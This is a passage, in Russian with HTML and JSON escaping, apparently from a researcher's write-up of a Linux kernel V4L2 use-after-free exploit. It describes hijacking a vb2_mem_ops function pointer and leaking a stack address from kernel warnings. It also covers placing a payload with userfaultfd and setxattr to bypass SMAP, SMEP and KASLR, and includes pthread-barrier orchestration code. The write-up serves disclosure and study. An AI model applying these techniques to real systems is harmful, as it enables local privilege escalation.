\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 <code>V4L2<\/code> (\u0440\u0430\u0437\u043c\u0435\u0440\u044b \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 \u043d\u0435 \u0432 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u0435).<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/e4d\/8bf\/d1f\/e4d8bfd1f4e408a5ebe08a021c0367c8.png\"><\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0443 \u043c\u0435\u043d\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e \u0437\u0430\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0430 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044c \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u043d\u043e\u0433\u043e <code>vb2_buffer<\/code>, \u044f \u043f\u043e\u0442\u0440\u0430\u0442\u0438\u043b \u043c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0430 \u043f\u043e\u0438\u0441\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442-\u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432\u0430 \u0432 <code>V4L2<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c. \u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0441\u043a\u043e\u043d\u0441\u0442\u0440\u0443\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 (arbitrary write) \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>vb2_buffer.planes<\/code>.<\/p>\n<p>  <\/p>\n<p>\u041d\u043e \u043f\u043e\u0437\u0436\u0435 \u044f \u043d\u0430\u0448\u0435\u043b \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044e, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u043c\u043d\u043e\u0433\u043e\u043e\u0431\u0435\u0449\u0430\u044e\u0449\u0435: <code>vb2_buffer.vb2_queue-&gt;mem_ops-&gt;vaddr<\/code>. \u041f\u0440\u043e\u0442\u043e\u0442\u0438\u043f \u0448\u0438\u043a\u0430\u0440\u043d\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u043f\u043e\u0442\u043e\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f: \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043e\u0434\u0438\u043d \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u0442\u0438\u043f\u0430 <code>void *<\/code>. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u043a\u043e\u0433\u0434\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f <code>vaddr()<\/code> \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f, \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 <code>vb2_buffer.planes[0].mem_priv<\/code>, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u044f \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e, \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u0435\u0439 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430.<\/p>\n<p>  <\/p>\n<h2 id=\"nepredvidennye-slozhnosti-kontekst-yadernogo-potoka\">\u041d\u0435\u043f\u0440\u0435\u0434\u0432\u0438\u0434\u0435\u043d\u043d\u044b\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438: \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430<\/h2>\n<p>  <\/p>\n<p>\u041d\u0430\u0439\u0434\u044f <code>vb2_mem_ops.vaddr<\/code>, \u044f \u043d\u0430\u0447\u0430\u043b \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 <code>vb2_buffer<\/code>, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u0431\u044b \u0434\u043e\u0441\u0442\u0438\u0447\u044c \u043a\u043e\u0434 <code>V4L2<\/code>, \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u0434\u0430\u043d\u043d\u044b\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044e.<\/p>\n<p>  <\/p>\n<p>\u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u044f \u0432\u044b\u043a\u043b\u044e\u0447\u0438\u043b \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b: <code>SMAP<\/code> (Supervisor Mode Access Prevention), <code>SMEP<\/code> (Supervisor Mode Execution Prevention) \u0438 <code>KPTI<\/code> (Kernel Page-Table Isolation). \u0417\u0430\u0442\u0435\u043c \u0441\u0434\u0435\u043b\u0430\u043b \u0442\u0430\u043a, \u0447\u0442\u043e\u0431\u044b \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c <code>vb2_buffer.vb2_queue<\/code> \u0441\u0441\u044b\u043b\u0430\u043b\u0441\u044f \u043d\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u043c \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0435, \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>mmap()<\/code>. \u042d\u0442\u043e \u0432\u0441\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u043e \u043e\u0448\u0438\u0431\u043a\u0443: <code>unable to handle page fault<\/code>. \u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430 (kthread context), \u0433\u0434\u0435 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442.<\/p>\n<p>  <\/p>\n<p>\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u043e\u0441\u044c \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0438\u0435 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430: \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440 <code>vb2_queue<\/code> \u0438 <code>vb2_mem_ops<\/code> \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c, \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0438\u0437 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430.<\/p>\n<p>  <\/p>\n<h2 id=\"ideya\">\u0418\u0434\u0435\u044f<\/h2>\n<p>  <\/p>\n<p>\u0412 \u0445\u043e\u0434\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u044f \u043e\u0442\u043c\u0435\u043d\u0438\u043b \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u043e\u0434\u0435 \u044f\u0434\u0440\u0430 Linux, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0434\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u0433\u043b\u0443\u0431\u043e\u043a\u043e\u0433\u043e \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0430. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043c\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u0442\u0438\u043f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u044f\u0434\u0435\u0440\u043d\u043e\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 (kernel warning) \u0432 <code>V4L2<\/code> \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u0435\u0440\u0435\u0434 \u043f\u043e\u0440\u0447\u0435\u0439 \u043f\u0430\u043c\u044f\u0442\u0438. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u043a\u043e\u0434 \u0438\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>__vb2_queue_cancel()<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0434\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u043e\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">    \/*      * If you see this warning, then the driver isn't cleaning up properly      * in stop_streaming(). See the stop_streaming() documentation in      * videobuf2-core.h for more information how buffers should be returned      * to vb2 in stop_streaming().      *\/     if (WARN_ON(atomic_read(&amp;q-&gt;owned_by_drv_count))) {<\/code><\/pre>\n<p>  <\/p>\n<p>\u042f \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u043c\u043e\u0433\u0443 \u043a\u0430\u043a-\u0442\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u0438\u0437 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0435 (\u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u0436\u0443\u0440\u043d\u0430\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043e\u0431\u044b\u0447\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043d\u0430 Ubuntu Server). \u041d\u043e \u044f \u043d\u0435 \u0437\u043d\u0430\u043b, \u0447\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c. \u0421\u043f\u0443\u0441\u0442\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u044f \u0440\u0435\u0448\u0438\u043b \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441 \u043c\u043e\u0438\u043c \u0434\u0440\u0443\u0433\u043e\u043c <a href=\"https:\/\/twitter.com\/andreyknvl\">\u0410\u043d\u0434\u0440\u0435\u0435\u043c \u041a\u043e\u043d\u043e\u0432\u0430\u043b\u043e\u0432\u044b\u043c<\/a> (<a href=\"https:\/\/github.com\/xairy\">xairy<\/a>), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u041e\u043d \u043f\u043e\u0434\u0430\u0440\u0438\u043b \u043c\u043d\u0435 \u043e\u0442\u043b\u0438\u0447\u043d\u0443\u044e \u0438\u0434\u0435\u044e \u2013 <code>\u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435 \u0438 \u0437\u0430\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u0435\u0435 \u0442\u0430\u043c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e userfaultfd(), \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e \u0442\u0435\u0445\u043d\u0438\u043a\u0435 \u0412\u0438\u0442\u0430\u043b\u0438\u044f \u041d\u0438\u043a\u043e\u043b\u0435\u043d\u043a\u043e<\/code>. \u042d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u0434\u0435\u043b\u0430\u043d\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043b\u044e\u0431\u043e\u0433\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u0441\u0442\u0435\u043a \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>copy_from_user()<\/code>. \u041f\u043e \u043c\u043e\u0435\u043c\u0443 \u043c\u043d\u0435\u043d\u0438\u044e, \u044d\u0442\u043e \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u0430\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u0430, \u044f \u0431\u044b \u043d\u0430\u0437\u0432\u0430\u043b \u0435\u0435 <strong>\u043c\u0435\u0442\u043e\u0434 xairy<\/strong>, \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u0438\u0442\u044c \u043c\u043e\u0435\u0433\u043e \u0434\u0440\u0443\u0433\u0430.<\/p>\n<p>  <\/p>\n<p>\u0427\u0430\u0441\u0442\u0438 \u043f\u0430\u0437\u043b\u0430 \u0441\u043b\u043e\u0436\u0438\u043b\u0438\u0441\u044c, \u044f \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u043c\u043e\u0433\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0430\u0434\u0440\u0435\u0441 \u0441\u0442\u0435\u043a\u0430 \u0438\u0437 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u0435 \u0438 \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0435\u0434\u0443\u0433\u0430\u0434\u0430\u0442\u044c \u0431\u0443\u0434\u0443\u0449\u0435\u0435 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430. \u042d\u0442\u043e \u0431\u044b\u043b \u0441\u0430\u043c\u044b\u0439 \u0440\u0430\u0434\u043e\u0441\u0442\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430 \u0432\u0441\u0435 \u0432\u0440\u0435\u043c\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f. \u0420\u0430\u0434\u0438 \u0442\u0430\u043a\u0438\u0445 \u043c\u043e\u043c\u0435\u043d\u0442\u043e\u0432 \u043c\u044b \u0438 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u043c\u0441\u044f \u044d\u0442\u0438\u043c, \u0432\u0435\u0440\u043d\u043e?<\/p>\n<p>  <\/p>\n<p>\u0418\u0442\u0430\u043a, \u0441\u043e\u0431\u0435\u0440\u0435\u043c \u0432\u043c\u0435\u0441\u0442\u0435 \u0432\u0441\u0435 \u044d\u0442\u0430\u043f\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b <code>SMAP<\/code>, <code>SMEP<\/code> \u0438 <code>KASLR<\/code> \u043d\u0430 Ubuntu Server 18.04.<\/p>\n<p>  <\/p>\n<h2 id=\"eksployt-orkestr\">\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442-\u043e\u0440\u043a\u0435\u0441\u0442\u0440<\/h2>\n<p>  <\/p>\n<p>\u0414\u043b\u044f \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0441\u043b\u043e\u0436\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u044f \u0441\u043e\u0437\u0434\u0430\u043b \u043d\u0430\u0431\u043e\u0440 \u043f\u043e\u0442\u043e\u043a\u043e\u0432 (pthreads), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0430 \u0431\u0430\u0440\u044c\u0435\u0440\u0430\u0445 (<code>pthread_barriers<\/code>). \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u0431\u0430\u0440\u044c\u0435\u0440\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0440\u0430\u0437\u0431\u0438\u0432\u0430\u044e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u044d\u0442\u0430\u043f\u044b:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)  #define THREADS_N 50      pthread_barrier_t barrier_prepare;     pthread_barrier_t barrier_race;     pthread_barrier_t barrier_parse;     pthread_barrier_t barrier_kstack;     pthread_barrier_t barrier_spray;     pthread_barrier_t barrier_fatality;      ...      ret = pthread_barrier_init(&amp;barrier_prepare, NULL, THREADS_N - 3);     if (ret != 0)         err_exit(&quot;[-] pthread_barrier_init&quot;);      ret = pthread_barrier_init(&amp;barrier_race, NULL, 2);     if (ret != 0)         err_exit(&quot;[-] pthread_barrier_init&quot;);      ret = pthread_barrier_init(&amp;barrier_parse, NULL, 3);     if (ret != 0)         err_exit(&quot;[-] pthread_barrier_init&quot;);      ret = pthread_barrier_init(&amp;barrier_kstack, NULL, 3);     if (ret != 0)         err_exit(&quot;[-] pthread_barrier_init&quot;);      ret = pthread_barrier_init(&amp;barrier_spray, NULL, THREADS_N - 5);     if (ret != 0)         err_exit(&quot;[-] pthread_barrier_init&quot;);      ret = pthread_barrier_init(&amp;barrier_fatality, NULL, 2);     if (ret != 0)         err_exit(&quot;[-] pthread_barrier_init&quot;);<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043e <strong>50 \u043f\u043e\u0442\u043e\u043a\u043e\u0432 (pthreads)<\/strong>, \u043a\u0430\u0436\u0434\u044b\u0439 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0438\u043c\u0435\u0435\u0442 <strong>\u043e\u0434\u043d\u0443 \u0438\u0437 \u043f\u044f\u0442\u0438 \u0440\u043e\u043b\u0435\u0439<\/strong>:<\/p>\n<p>  <\/p>\n<ul>\n<li>2 <code>racer<\/code>-\u043f\u043e\u0442\u043e\u043a\u0430 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438;<\/li>\n<li>(THREADS_N \u2014 6) = 44 <code>sprayer<\/code>-\u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0432\u0438\u0441\u0430\u044e\u0442 \u043d\u0430 <code>setxattr()<\/code> \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u043c <code>userfaultfd()<\/code>,<\/li>\n<li>2 \u043f\u043e\u0442\u043e\u043a\u0430 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u043e\u0442\u043a\u0430\u0437\u043e\u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 <code>userfaultfd()<\/code>;<\/li>\n<li>1 \u043f\u043e\u0442\u043e\u043a \u0434\u043b\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 <code>\/dev\/kmsg<\/code> \u0438 \u0430\u0434\u0430\u043f\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u043b\u044f \u044f\u0434\u0435\u0440\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438;<\/li>\n<li>1 <code>fatality<\/code>-\u043f\u043e\u0442\u043e\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.<\/li>\n<\/ul>\n<p>  <\/p>\n<p>\u041f\u043e\u0442\u043e\u043a\u0438, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0440\u043e\u043b\u0438, \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043d\u0430 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043d\u0430\u0431\u043e\u0440\u0430\u0445 \u0431\u0430\u0440\u044c\u0435\u0440\u043e\u0432. \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>pthread_barrier_init()<\/code> \u0437\u0430\u0434\u0430\u0435\u0442 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0442\u043e\u043a\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 <strong>\u0434\u043e\u043b\u0436\u043d\u044b \u0432\u043c\u0435\u0441\u0442\u0435 \u043f\u043e\u0434\u043e\u0439\u0442\u0438<\/strong> \u043a \u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0431\u0430\u0440\u044c\u0435\u0440\u0443 (\u0442\u043e \u0435\u0441\u0442\u044c \u0432\u044b\u0437\u0432\u0430\u0442\u044c <code>pthread_barrier_wait()<\/code>) \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u0441\u0432\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0434\u0430\u043b\u044c\u0448\u0435. \u041f\u043e\u0436\u0430\u043b\u0443\u0439, \u0442\u0430\u043a \u0434\u043b\u044f \u043c\u0435\u043d\u044f \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043c\u043e\u0439 \u00ab\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442-\u043e\u0440\u043a\u0435\u0441\u0442\u0440\u00bb:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/627\/549\/d5c\/627549d5c57a099257178d3b4529075b.png\" alt=\"Image source: https:\/\/singletothemax.files.wordpress.com\/2011\/02\/symphony_099_cropped1.jpg\"><\/p>\n<p>\u0421\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0442\u043e\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u0438\u0445 \u0440\u0430\u0431\u043e\u0442\u0443 \u0438 \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0430\u0446\u0438\u044e \u043d\u0430 \u0431\u0430\u0440\u044c\u0435\u0440\u0430\u0445 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>pthread_barrier_wait()<\/code>. \u0411\u0430\u0440\u044c\u0435\u0440\u044b 